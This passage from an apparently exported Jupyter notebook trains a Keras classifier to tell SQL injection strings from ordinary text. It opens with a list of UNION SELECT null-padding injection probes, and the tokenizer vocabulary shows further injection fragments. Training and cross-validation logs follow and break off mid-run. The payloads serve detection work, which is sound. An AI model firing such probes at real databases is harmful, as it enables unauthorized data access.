 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',

In [12]:
new_s=new_s1+new_s2

In [61]:
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
tokenizer1 = Tokenizer(num_words = 100000, oov_token="<OOV>")
tokenizer1.fit_on_texts(new_s)
word_index1 = tokenizer1.word_index
word_index1

{'<OOV>': 1,
 'null': 2,
 '35': 3,
 '1': 4,
 'select': 5,
 'schema': 6,
 'char': 7,
 '45': 8,
 'cast': 9,
 'information': 10,
 'mid': 11,
 'ifnull': 12,
 '0x20': 13,
 'ord': 14,
 'limit': 15,
 'name': 16,
 "'": 17,
 'distinct': 18,
 'schemata': 19,
 'case': 20,
 'end': 21,
 "1'": 22,
 'else': 23,
 'union': 24,
 'elt': 25,
 'chr': 26,
 '120': 27,
 'u': 28,
 '81': 29,
 'login': 30,
 '0': 31,
 'concat': 32,
 'like': 33,
 '0x716a767871': 34,
 '0x71627a7871': 35,
 '2': 36,
 'make': 37,
 'set': 38,
 'table': 39,
 'id': 40,
 'order': 41,
 'x': 42,
 'test': 43,
 'said': 44,
 '3': 45,
 '49': 46,
 'dual': 47,
 'tb': 48,
 '9483': 49,
 '96': 50,
 '5': 51,
 '0x78': 52,
 '8446744073709551610': 53,
 'character': 54,
 '4': 55,
 'sets': 56,
 '112': 57,
 '3860': 58,
 '1059': 59,
 '8601': 60,
 '6': 61,
 'pw': 62,
 'year': 63,
 '9': 64,
 '7': 65,
 '8': 66,
 'numeric': 67,
 'ctxsys': 68,
 'drithsx': 69,
 'sn': 70,
 '0x6c6f67696e5f74657374': 71,
 'group': 72,
 'also': 73,
 '3368': 74,
 'plugins': 75,
 'count': 76,
 'u0016': 77,
 'one': 78,
 '7535': 79,
 '116': 80,
 '8022': 81,
 '7988': 82,
 '3038': 83,
 '9092': 84,
 '10': 85,
 '104': 86,
 'using': 87,
 '2682': 88,
 '9946': 89,
 'time': 90,
 'would': 91,
 'floor': 92,
 'column': 93,
 'rand': 94,
 '50': 95,
 '4090': 96,
 '8903': 97,
 'new': 98,
 'convert': 99,
 'columns': 100,
 '110': 101,
 'a': 102,
 '3131': 103,
 '9885': 104,
 '2157': 105,
 'if': 106,
 's': 107,
 'from': 108,
 'exp': 109,
 'json': 110,
 'keys': 111,
 'utf8': 112,
 'people': 113,
 '3133': 114,
 '6776': 115,
 '9947': 116,
 '5349': 117,
 '7749': 118,
 '1277': 119,
 '0x74625f6c6f67696e': 120,
 '2380': 121,
 '6952': 122,
 '4244': 123,
 '2013': 124,
 '7964': 125,
 '4266': 126,
 '3600': 127,
 '6974': 128,
 'rlike': 129,
 '0x28': 130,
 'two': 131,
 '3954': 132,
 '5337': 133,
 '48': 134,
 '7848': 135,
 '9357': 136,
 '9060': 137,
 '1858': 138,
 '9061': 139,
 'could': 140,
 '4648': 141,
 '9812': 142,
 '8852': 143,
 '11': 144,
 '5077': 145,
 '5607': 146,
 '5356': 147,
 '4728': 148,
 '12': 149,
 '115': 150,
 '51': 151,
 '3911': 152,
 '3718': 153,
 '5628': 154,
 '8365': 155,
 '9718': 156,
 '6562': 157,
 '5359': 158,
 '2164': 159,
 '8094': 160,
 'mysql': 161,
 'db': 162,
 '9778': 163,
 '1882': 164,
 '7875': 165,
 '13': 166,
 '4741': 167,
 '7326': 168,
 '14': 169,
 '15': 170,
 '4122': 171,
 '9700': 172,
 '8144': 173,
 '7547': 174,
 '9698': 175,
 '8407': 176,
 '6199': 177,
 '6209': 178,
 'first': 179,
 '3428': 180,
 '3302': 181,
 '1250': 182,
 '4843': 183,
 '8838': 184,
 '2935': 185,
 'mr': 186,
 '6893': 187,
 '1943': 188,
 '4920': 189,
 '7328': 190,
 '1626': 191,
 '5989': 192,
 '8383': 193,
 '3251': 194,
 '5403': 195,
 '8313': 196,
 '2891': 197,
 '4000': 198,
 '102': 199,
 '9751': 200,
 '3050': 201,
 '8564': 202,
 '2820': 203,
 '4460': 204,
 '9748': 205,
 '4950': 206,
 '4582': 207,
 '2739': 208,
 '2971': 209,
 '7357': 210,
 '3614': 211,
 '5515': 212,
 'however': 213,
 '52': 214,
 '2137': 215,
 '6294': 216,
 'say': 217,
 '3714': 218,
 '9438': 219,
 '2535': 220,
 'child': 221,
 '2480': 222,
 '2438': 223,
 '6351': 224,
 'work': 225,
 '113': 226,
 '2998': 227,
 '5786': 228,
 '4413': 229,
 '1910': 230,
 '4972': 231,
 '2170': 232,
 '3821': 233,
 '6935': 234,
 'government': 235,
 'according': 236,
 '1317': 237,
 '9615': 238,
 '6762': 239,
 '2275': 240,
 '4919': 241,
 '6925': 242,
 '3706': 243,
 '6880': 244,
 '9838': 245,
 'day': 246,
 '108': 247,
 '54': 248,
 '9327': 249,
 '3027': 250,
 'tables': 251,
 '7224': 252,
 'state': 253,
 '114': 254,
 '3447': 255,
 '1282': 256,
 '3014': 257,
 '5825': 258,
 '7665': 259,
 'man': 260,
 '1151': 261,
 '1621': 262,
 '2156': 263,
 '2504': 264,
 '2918': 265,
 '4894': 266,
 '5844': 267,
 '4839': 268,
 '8566': 269,
 'town': 270,
 'mode': 271,
 '106': 272,
 '53': 273,
 '3331': 274,
 'many': 275,
 '3018': 276,
 '4458': 277,
 '3532': 278,
 'million': 279,
 'boolean': 280,
 '7992': 281,
 '6938': 282,
 '8688': 283,
 'around': 284,
 '3188': 285,
 '8987': 286,
 '9571': 287,
 '100': 288,
 '1237': 289,
 '7769': 290,
 'company': 291,
 '56': 292,
 '4192': 293,
 '55': 294,
 '9441': 295,
 '2622': 296,
 '8142': 297,
 '6931': 298,
 'system': 299,
 'use': 300,
 'police': 301,
 'team': 302,
 '7408': 303,
 '1777': 304,
 '8901': 305,
 '9989': 306,
 'come': 307,
 'well': 308,
 '4969': 309,
 '7392': 310,
 'must': 311,
 'way': 312,
 'life': 313,
 'device': 314,
 '79': 315,
 '4915': 316,
 '7719': 317,
 'may': 318,
 'back': 319,
 '57': 320,
 '8382': 321,
 '1344': 322,
 'take': 323,
 'school': 324,
 '82': 325,
 '8488': 326,
 '7724': 327,
 'even': 328,
 'old': 329,
 'change': 330,
 'service': 331,
 '5730': 332,
 '2912': 333,
 'get': 334,
 'german': 335,
 '9731': 336,
 '2838': 337,
 '7552': 338,
 'passenger': 339,
 'business': 340,
 '1415': 341,
 '3931': 342,
 '3531': 343,
 '2571111111111111': 344,
 'world': 345,
 'public': 346,
 'three': 347,
 '64': 348,
 '6385': 349,
 '6285': 350,
 '2629': 351,
 'know': 352,
 'thursday': 353,
 '9858': 354,
 '3553': 355,
 'made': 356,
 'found': 357,
 'court': 358,
 '9992': 359,
 '5196': 360,
 '9021': 361,
 '3971': 362,
 'former': 363,
 '111': 364,
 '3142': 365,
 '9066': 366,
 '4503': 367,
 '8937': 368,
 '4408': 369,
 'good': 370,
 'place': 371,
 'care': 372,
 '4067': 373,
 '3827': 374,
 '5808': 375,
 '9454': 376,
 '7242': 377,
 '3717': 378,
 'law': 379,
 'right': 380,
 'want': 381,
 'since': 382,
 'still': 383,
 'every': 384,
 'need': 385,
 'week': 386,
 'told': 387,
 '3901': 388,
 '3469': 389,
 '8190': 390,
 '2206': 391,
 'light': 392,
 'member': 393,
 'show': 394,
 'home': 395,
 'already': 396,
 'house': 397,
 'result': 398,
 'airline': 399,
 'per': 400,
 '98': 401,
 '6174': 402,
 '8718': 403,
 '5090': 404,
 'authority': 405,
 '118': 406,
 '8905': 407,
 'cent': 408,
 'whether': 409,
 'dog': 410,
 '84': 411,
 '9560': 412,
 'last': 413,
 'much': 414,
 'long': 415,
 'europe': 416,
 'city': 417,
 'project': 418,
 '8246': 419,
 '5336': 420,
 '5402': 421,
 '2756': 422,
 'country': 423,
 'question': 424,
 'local': 425,
 'agency': 426,
 'several': 427,
 '72': 428,
 '3411': 429,
 '6839': 430,
 '4029': 431,
 '1469': 432,
 'thing': 433,
 'high': 434,
 'plan': 435,
 'month': 436,
 'following': 437,
 'car': 438,
 'snowden': 439,
 '2927': 440,
 '6894': 441,
 '4665': 442,
 'data': 443,
 'plane': 444,
 'european': 445,
 'obama': 446,
 'national': 447,
 'second': 448,
 '101': 449,
 '3336': 450,
 'men': 451,
 'possible': 452,
 'able': 453,
 'decision': 454,
 'council': 455,
 '90': 456,
 '9205': 457,
 '7176': 458,
 '7924': 459,
 '5469': 460,
 '2177': 461,
 '6344': 462,
 'great': 463,
 'four': 464,
 'church': 465,
 'keep': 466,
 'party': 467,
 'see': 468,
 'office': 469,
 'number': 470,
 'punctuation': 471,
 'seat': 472,
 'president': 473,
 'germany': 474,
 'report': 475,
 'traffic': 476,
 '93': 477,
 'hand': 478,
 'face': 479,
 'event': 480,
 'flight': 481,
 'part': 482,
 'area': 483,
 'drug': 484,
 '97': 485,
 '5624': 486,
 '2989': 487,
 '2796': 488,
 'put': 489,
 'thus': 490,
 'point': 491,
 'statement': 492,
 'came': 493,
 'vehicle': 494,
 'almost': 495,
 'evening': 496,
 'phone': 497,
 'among': 498,
 '2088': 499,
 'without': 500,
 'give': 501,
 'hope': 502,
 'age': 503,
 'next': 504,
 'building': 505,
 'past': 506,
 'health': 507,
 'help': 508,
 'friday': 509,
 'american': 510,
 'market': 511,
 'driver': 512,
 'explained': 513,
 '95': 514,
 '9140': 515,
 '9627': 516,
 'line': 517,
 'better': 518,
 'given': 519,
 'person': 520,
 'pay': 521,
 'used': 522,
 'parsing': 523,
 'federal': 524,
 'taken': 525,
 'major': 526,
 'gender': 527,
 '18': 528,
 '99': 529,
 '1240': 530,
 '6511': 531,
 'due': 532,
 'think': 533,
 'black': 534,
 'community': 535,
 'hour': 536,
 'attack': 537,
 'official': 538,
 'road': 539,
 'sunday': 540,
 'exchange': 541,
 'district': 542,
 'fee': 543,
 '8816': 544,
 '7451': 545,
 'mean': 546,
 'clear': 547,
 'large': 548,
 'news': 549,
 'find': 550,
 'become': 551,
 'centre': 552,
 'model': 553,
 'view': 554,
 'left': 555,
 'including': 556,
 'travel': 557,
 'cost': 558,
 'safety': 559,
 'anniversary': 560,
 'foreign': 561,
 'security': 562,
 'small': 563,
 'ago': 564,
 'citizen': 565,
 'bwelle': 566,
 'tunnel': 567,
 '109': 568,
 'extractvalue': 569,
 '0x5c': 570,
 '4364': 571,
 '4974': 572,
 'though': 573,
 'issue': 574,
 'text': 575,
 'sentence': 576,
 'called': 577,
 'parish': 578,
 'word': 579,
 'head': 580,
 'wall': 581,
 'measure': 582,
 'speech': 583,
 'problem': 584,
 'required': 585,
 'reported': 586,
 'parent': 587,
 'least': 588,
 'department': 589,
 'expert': 590,
 'electronic': 591,
 'woman': 592,
 'later': 593,
 'became': 594,
 'director': 595,
 'medium': 596,
 'google': 597,
 'regarding': 598,
 'minister': 599,
 'gas': 600,
 'third': 601,
 'policy': 602,
 '16': 603,
 '17': 604,
 '69': 605,
 'early': 606,
 'power': 607,
 'thought': 608,
 'within': 609,
 'look': 610,
 'five': 611,
 'force': 612,
 'account': 613,
 'individual': 614,
 'appeal': 615,
 'course': 616,
 'performance': 617,
 'going': 618,
 'chief': 619,
 'really': 620,
 'girl': 621,
 'fire': 622,
 'money': 623,
 'meeting': 624,
 'today': 625,
 'family': 626,
 'cardinal': 627,
 '2531': 628,
 '9187': 629,
 '5882': 630,
 'as': 631,
 'always': 632,
 'another': 633,
 'best': 634,
 'play': 635,
 'looking': 636,
 'united': 637,
 'prediction': 638,
 'offer': 639,
 'start': 640,
 'turn': 641,
 'sleep': 642,
 'free': 643,
 'move': 644,
 'surveillance': 645,
 'bank': 646,
 'away': 647,
 'medical': 648,
 'development': 649,
 'tax': 650,
 'charge': 651,
 'metre': 652,
 'story': 653,
 'property': 654,
 'scotland': 655,
 '105': 656,
 '117': 657,
 '47': 658,
 '5471': 659,
 'across': 660,
 'yet': 661,
 'fact': 662,
 'half': 663,
 'stand': 664,
 'young': 665,
 'rather': 666,
 'interest': 667,
 'future': 668,
 'coming': 669,
 'process': 670,
 'economic': 671,
 'rescue': 672,
 'september': 673,
 'south': 674,
 'far': 675,
 '103': 676,
 '6701': 677,
 '1273': 678,
 '8163': 679,
 'read': 680,
 'true': 681,
 'book': 682,
 'ground': 683,
 'le': 684,
 'love': 685,
 'saying': 686,
 'go': 687,
 'others': 688,
 'level': 689,
 'feature': 690,
 'together': 691,
 'different': 692,
 'announced': 693,
 'support': 694,
 'big': 695,
 'provided': 696,
 'provide': 697,
 'price': 698,
 'faa': 699,
 'death': 700,
 'top': 701,
 'activity': 702,
 'nsa': 703,
 'longer': 704,
 'executive': 705,
 'commission': 706,
 'renamo': 707,
 'university': 708,
 'term': 709,
 'railway': 710,
 'investigation': 711,
 'important': 712,
 'doctor': 713,
 'website': 714,
 'billion': 715,
 'ditta': 716,
 'cocaine': 717,
 'program': 718,
 '67': 719,
 '65': 720,
 '5603': 721,
 'no': 722,
 'puberty': 723,
 'hundred': 724,
 'action': 725,
 'begin': 726,
 'experience': 727,
 'little': 728,
 'matter': 729,
 'example': 730,
 'current': 731,
 'research': 732,
 'focus': 733,
 'leader': 734,
 'reason': 735,
 'campaign': 736,
 'mayor': 737,
 'hospital': 738,
 'staff': 739,
 'secret': 740,
 'something': 741,
 'increase': 742,
 'risk': 743,
 'wanted': 744,
 'chemical': 745,
 'planned': 746,
 'study': 747,
 'rate': 748,
 'committee': 749,
 'criminal': 750,
 'energy': 751,
 'frontier': 752,
 '122': 753,
 '119': 754,
 '94': 755,
 '6325': 756,
 '9811': 757,
 '3941': 758,
 '9364': 759,
 'act': 760,
 'side': 761,
 'full': 762,
 'society': 763,
 'effort': 764,
 'cannot': 765,
 'cause': 766,
 'mile': 767,
 'situation': 768,
 'concern': 769,
 'therefore': 770,
 'took': 771,
 'space': 772,
 'mark': 773,
 'paper': 774,
 'type': 775,
 'press': 776,
 'judge': 777,
 'close': 778,
 'york': 779,
 'music': 780,
 'financial': 781,
 'protection': 782,
 'eu': 783,
 'discussion': 784,
 'resident': 785,
 'water': 786,
 'location': 787,
 'surgery': 788,
 'recent': 789,
 'association': 790,
 'uk': 791,
 'crossing': 792,
 'continue': 793,
 'worker': 794,
 'role': 795,
 'transportation': 796,
 'club': 797,
 'bag': 798,
 'percent': 799,
 'majority': 800,
 '19': 801,
 '76': 802,
 '78': 803,
 '6363': 804,
 '8126': 805,
 'believe': 806,
 'eye': 807,
 'might': 808,
 'adult': 809,
 'lord': 810,
 'call': 811,
 'evidence': 812,
 'added': 813,
 'present': 814,
 'record': 815,
 'heard': 816,
 'et': 817,
 'al': 818,
 'period': 819,
 'airbus': 820,
 'technical': 821,
 'proposal': 822,
 'injured': 823,
 'accident': 824,
 'site': 825,
 'political': 826,
 'managed': 827,
 'august': 828,
 'open': 829,
 'customer': 830,
 'planning': 831,
 'condition': 832,
 'october': 833,
 'australian': 834,
 'night': 835,
 'weapon': 836,
 'earlier': 837,
 'daughter': 838,
 'crime': 839,
 'ymca': 840,
 '83': 841,
 '4098': 842,
 '8986': 843,
 'nothing': 844,
 'subject': 845,
 'private': 846,
 'working': 847,
 'never': 848,
 'live': 849,
 'mother': 850,
 'game': 851,
 'figure': 852,
 'simply': 853,
 'bill': 854,
 'behind': 855,
 'responsible': 856,
 'body': 857,
 'standard': 858,
 'inside': 859,
 'previous': 860,
 'short': 861,
 'joint': 862,
 'industry': 863,
 'regional': 864,
 'wednesday': 865,
 'hall': 866,
 'asked': 867,
 'chairman': 868,
 'intelligence': 869,
 'goal': 870,
 'caused': 871,
 'procedure': 872,
 'm': 873,
 'regulator': 874,
 'festival': 875,
 'forest': 876,
 'continued': 877,
 'finally': 878,
 'six': 879,
 'budget': 880,
 'match': 881,
 'food': 882,
 'front': 883,
 'option': 884,
 'london': 885,
 'airport': 886,
 'cream': 887,
 'benchmark': 888,
 'int': 889,
 '21': 890,
 '68': 891,
 '8050': 892,
 '2805': 893,
 '1708': 894,
 '7090': 895,
 'particular': 896,
 'claim': 897,
 'soon': 898,
 'seen': 899,
 'rule': 900,
 'board': 901,
 'air': 902,
 'ever': 903,
 'field': 904,
 'roman': 905,
 'addition': 906,
 'boeing': 907,
 'aircraft': 908,
 'expected': 909,
 'central': 910,
 'recently': 911,
 'concept': 912,
 'catholic': 913,
 'immediately': 914,
 'transport': 915,
 'white': 916,
 'administration': 917,
 'reached': 918,
 'guest': 919,
 'receive': 920,
 'meet': 921,
 'remain': 922,
 'basis': 923,
 'presented': 924,
 'announcement': 925,
 'movement': 926,
 'election': 927,
 'north': 928,
 'geisingen': 929,
 'australia': 930,
 'track': 931,
 'syria': 932,
 'green': 933,
 'construction': 934,
 'usa': 935,
 'released': 936,
 'rail': 937,
 'hair': 938,
 'lawyer': 939,
 'user': 940,
 'total': 941,
 'britain': 942,
 'museum': 943,
 'eur': 944,
 'ice': 945,
 'theology': 946,
 'planet': 947,
 '37': 948,
 '87': 949,
 'star': 950,
 'late': 951,
 'let': 952,
 'heart': 953,
 'whole': 954,
 'nature': 955,
 'express': 956,
 'idea': 957,
 'done': 958,
 'attempt': 959,
 'boy': 960,
 'sure': 961,
 'independent': 962,
 'affair': 963,
 'sometimes': 964,
 'living': 965,
 'vote': 966,
 'low': 967,
 'bring': 968,
 'trade': 969,
 'step': 970,
 'stream': 971,
 'access': 972,
 'global': 973,
 'training': 974,
 'higher': 975,
 'section': 976,
 'emphasised': 977,
 'economy': 978,
 'unit': 979,
 'choose': 980,
 'held': 981,
 'seriously': 982,
 'initially': 983,
 'towards': 984,
 'confirmed': 985,
 'investment': 986,
 'mission': 987,
 'benefit': 988,
 'carried': 989,
 'russia': 990,
 'post': 991,
 'form': 992,
 'address': 993,
 'share': 994,
 'currently': 995,
 'saturday': 996,
 'started': 997,
 'yesterday': 998,
 'died': 999,
 'tail': 1000,
 ...}

In [14]:
sequences1 = tokenizer1.texts_to_sequences(new_s)

In [15]:
n=0
for i in sequences1:
    n=max(n,len(i))
n

194

In [16]:
padded1 = pad_sequences(sequences1, maxlen=150,padding="post")
padded1.shape

(9620, 150)

In [17]:
df_new=pd.DataFrame(padded1)
df_new["target"]=y
df_new.head()

,0,1,2,3,4,5,6,7,8,9,...,141,142,143,144,145,146,147,148,149,target
0,260,950,1874,0,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0
1,4062,1875,1603,260,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0
2,4063,392,6984,4064,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0
3,844,1094,606,951,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0
4,760,2933,370,2934,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0

In [18]:
from sklearn.model_selection import train_test_split
X_train,X_test,y_train,y_test=train_test_split(df_new.iloc[:,:150],pd.Series(y),random_state=42)

In [19]:
model=keras.Sequential()
model.add(keras.layers.Embedding(17000,16))
model.add(keras.layers.GlobalAveragePooling1D())
model.add(keras.layers.Dense(16,activation="relu"))
model.add(keras.layers.Dropout(p=0.3))
model.add(keras.layers.Dense(32,activation="relu"))
model.add(keras.layers.Dropout(p=0.3))
model.add(keras.layers.Dense(1,activation='sigmoid'))

model.compile(optimizer="adam",loss="binary_crossentropy",metrics=["accuracy"])

WARNING:tensorflow:From C:\Anaconda3\lib\site-packages\tensorflow\python\framework\op_def_library.py:263: colocate_with (from tensorflow.python.framework.ops) is deprecated and will be removed in a future version.
Instructions for updating:
Colocations handled automatically by placer.
WARNING:tensorflow:From C:\Anaconda3\lib\site-packages\keras\backend\tensorflow_backend.py:3019: calling dropout (from tensorflow.python.ops.nn_ops) with keep_prob is deprecated and will be removed in a future version.
Instructions for updating:
Please use `rate` instead of `keep_prob`. Rate should be set to `rate = 1 - keep_prob`.

C:\Anaconda3\lib\site-packages\ipykernel_launcher.py:5: UserWarning: Update your `Dropout` call to the Keras 2 API: `Dropout(rate=0.3)`
  """
C:\Anaconda3\lib\site-packages\ipykernel_launcher.py:7: UserWarning: Update your `Dropout` call to the Keras 2 API: `Dropout(rate=0.3)`
  import sys

In [20]:
model.fit(np.array(X_train),np.array(y_train),epochs=10,batch_size=50,verbose=1)

WARNING:tensorflow:From C:\Anaconda3\lib\site-packages\tensorflow\python\ops\math_ops.py:3066: to_int32 (from tensorflow.python.ops.math_ops) is deprecated and will be removed in a future version.
Instructions for updating:
Use tf.cast instead.
Epoch 1/10
7215/7215 [==============================] - 4s 521us/step - loss: 0.6692 - acc: 0.6143
Epoch 2/10
7215/7215 [==============================] - 2s 299us/step - loss: 0.5181 - acc: 0.7125
Epoch 3/10
7215/7215 [==============================] - 2s 325us/step - loss: 0.2516 - acc: 0.9356
Epoch 4/10
7215/7215 [==============================] - 2s 249us/step - loss: 0.1239 - acc: 0.9640
Epoch 5/10
7215/7215 [==============================] - 2s 266us/step - loss: 0.0747 - acc: 0.9780
Epoch 6/10
7215/7215 [==============================] - 3s 351us/step - loss: 0.0504 - acc: 0.9852 0s - loss
Epoch 7/10
7215/7215 [==============================] - 2s 271us/step - loss: 0.0407 - acc: 0.9874
Epoch 8/10
7215/7215 [==============================] - 2s 323us/step - loss: 0.0285 - acc: 0.9933
Epoch 9/10
7215/7215 [==============================] - 2s 311us/step - loss: 0.0203 - acc: 0.9950
Epoch 10/10
7215/7215 [==============================] - 2s 256us/step - loss: 0.0175 - acc: 0.9971

In [21]:
from sklearn.model_selection import cross_val_score
from keras.wrappers.scikit_learn import KerasClassifier
def build_classifier():
    model=keras.Sequential()
    model.add(keras.layers.Embedding(17000,16))
    model.add(keras.layers.GlobalAveragePooling1D())
    model.add(keras.layers.Dense(16,activation="relu"))
    model.add(keras.layers.Dropout(p=0.3))
    model.add(keras.layers.Dense(32,activation="relu"))
    model.add(keras.layers.Dropout(p=0.3))
    model.add(keras.layers.Dense(1,activation='sigmoid'))

    model.compile(optimizer="adam",loss="binary_crossentropy",metrics=["accuracy"])
    
    return model

In [22]:
classifier=KerasClassifier(build_fn=build_classifier,batch_size=50,epochs=10)
accuracies=cross_val_score(estimator=classifier,X=X_train,y=y_train,cv=10)

C:\Anaconda3\lib\site-packages\ipykernel_launcher.py:8: UserWarning: Update your `Dropout` call to the Keras 2 API: `Dropout(rate=0.3)`

C:\Anaconda3\lib\site-packages\ipykernel_launcher.py:10: UserWarning: Update your `Dropout` call to the Keras 2 API: `Dropout(rate=0.3)`
  # Remove the CWD from sys.path while we load stuff.

Epoch 1/10
6493/6493 [==============================] - 4s 677us/step - loss: 0.6688 - acc: 0.6137 7s - loss - ETA: 1s - loss: 0.6
Epoch 2/10
6493/6493 [==============================] - 3s 472us/step - loss: 0.5643 - acc: 0.6602 0s - loss: 0.5789 - ac
Epoch 3/10
6493/6493 [==============================] - 3s 423us/step - loss: 0.3154 - acc: 0.9148
Epoch 4/10
6493/6493 [==============================] - 4s 583us/step - loss: 0.1565 - acc: 0.9623
Epoch 5/10
6493/6493 [==============================] - 3s 406us/step - loss: 0.0880 - acc: 0.9757
Epoch 6/10
6493/6493 [==============================] - 2s 280us/step - loss: 0.0644 - acc: 0.9817
Epoch 7/10
6493/6493 [==============================] - 2s 362us/step - loss: 0.0527 - acc: 0.9843 0s - loss: 0.0509  - ETA: 0s - loss: 0.052
Epoch 8/10
6493/6493 [==============================] - 2s 343us/step - loss: 0.0408 - acc: 0.9869
Epoch 9/10
6493/6493 [==============================] - 3s 490us/step - loss: 0.0311 - acc: 0.9915
Epoch 10/10
6493/6493 [==============================] - 3s 436us/step - loss: 0.0287 - acc: 0.9915 1s - loss: 0.0349 - ETA: 1s - loss: 0.033
722/722 [==============================] - 1s 762us/step
Epoch 1/10
6493/6493 [==============================] - 3s 478us/step - loss: 0.6638 - acc: 0.6174 0s - loss: 0.6653 - acc: 0.
Epoch 2/10
6493/6493 [==============================] - 3s 510us/step - loss: 0.5121 - acc: 0.7203
Epoch 3/10
6493/6493 [==============================] - ETA: 0s - loss: 0.2718 - acc: 0.9274- ETA: 0s - loss: 0.2822 - acc - 3s 482us/step - loss: 0.2716 - acc: 0.9276
Epoch 4/10
6493/6493 [==============================] - 3s 405us/step - loss: 0.1367 - acc: 0.9618
Epoch 5/10
6493/6493 [==============================] - 3s 509us/step - loss: 0.0803 - acc: 0.9787
Epoch 6/10
6493/6493 [==============================] - 2s 316us/step - loss: 0.0606 - acc: 0.9821 0s - loss: 0.0611 - acc
Epoch 7/10
6493/6493 [==============================] - 2s 293us/step - loss: 0.0440 - acc: 0.9869 1s - los
Epoch 8/10
6493/6493 [==============================] - 1s 205us/step - loss: 0.0316 - acc: 0.9923
Epoch 9/10
6493/6493 [==============================] - 1s 176us/step - loss: 0.0260 - acc: 0.9941
Epoch 10/10
6493/6493 [==============================] - 2s 293us/step - loss: 0.0205 - acc: 0.9958
722/722 [==============================] - 1s 924us/step
Epoch 1/10
6493/6493 [==============================] - 3s 456us/step - loss: 0.6626 - acc: 0.6133
Epoch 2/10
6493/6493 [==============================] - 1s 213us/step - loss: 0.4925 - acc: 0.7377 0s - loss: 0.4985 - acc: 0.72
Epoch 3/10
6493/6493 [==============================] - 1s 224us/step - loss: 0.2493 - acc: 0.9429 0s - loss: 0.2658 - acc:
Epoch 4/10
6493/6493 [==============================] - 1s 218us/step - loss: 0.1260 - acc: 0.9681
Epoch 5/10
6493/6493 [==============================] - 1s 201us/step - loss: 0.0817 - acc: 0.9757
Epoch 6/10
6493/6493 [==============================] - 2s 309us/step - loss: 0.0570 - acc: 0.9848
Epoch 7/10
6493/6493 [==============================] - 1s 187us/step - loss: 0.0403 - acc: 0.9906
Epoch 8/10
6493/6493 [==============================] - 1s 218us/step - loss: 0.0309 - acc: 0.9943 0s - loss: 0.0334 - acc
Epoch 9/10
6493/6493 [==============================] - 2s 300us/step - loss: 0.0267 - acc: 0.9921 0s - loss: 0.0240
Epoch 10/10
6493/6493 [==============================] - 1s 204us/step - loss: 0.0215 - acc: 0.9957
722/722 [==============================] - 0s 369us/step
Epoch 1/10
6493/6493 [==============================] - 3s 516us/step - loss: 0.6703 - acc: 0.6119
Epoch 2/10
6493/6493 [==============================] - 2s 328us/step - loss: 0.5465 - acc: 0.7071 0s - loss: 0.60
Epoch 3/10
6493/6493 [==============================] - 2s 291us/step - loss: 0.2838 - acc: 0.9161 1s - loss: 0.
Epoch 4/10
6493/6493 [==============================] - 2s 332us/step - loss: 0.1384 - acc: 0.9694 0s - l
Epoch 5/10
6493/6493 [==============================] - 1s 161us/step - loss: 0.0842 - acc: 0.9743
Epoch 6/10
6493/6493 [==============================] - 1s 151us/step - loss: 0.0565 - acc: 0.9855
Epoch 7/10
6493/6493 [==============================] - 1s 152us/step - loss: 0.0450 - acc: 0.9869
Epoch 8/10
6493/6493 [==============================] - 1s 153us/step - loss: 0.0343 - acc: 0.9914
Epoch 9/10
6493/6493 [==============================] - 1s 155us/step - loss: 0.0247 - acc: 0.9946
Epoch 10/10
6493/6493 [==============================] - 1s 155us/step - loss: 0.0231 - acc: 0.9938
722/722 [==============================] - 0s 359us/step
Epoch 1/10
6493/6493 [==============================] - 3s 464us/step - loss: 0.6690 - acc: 0.6131
Epoch 2/10
6493/6493 [==============================] - 1s 162us/step - loss: 0.5518 - acc: 0.6453
Epoch 3/10
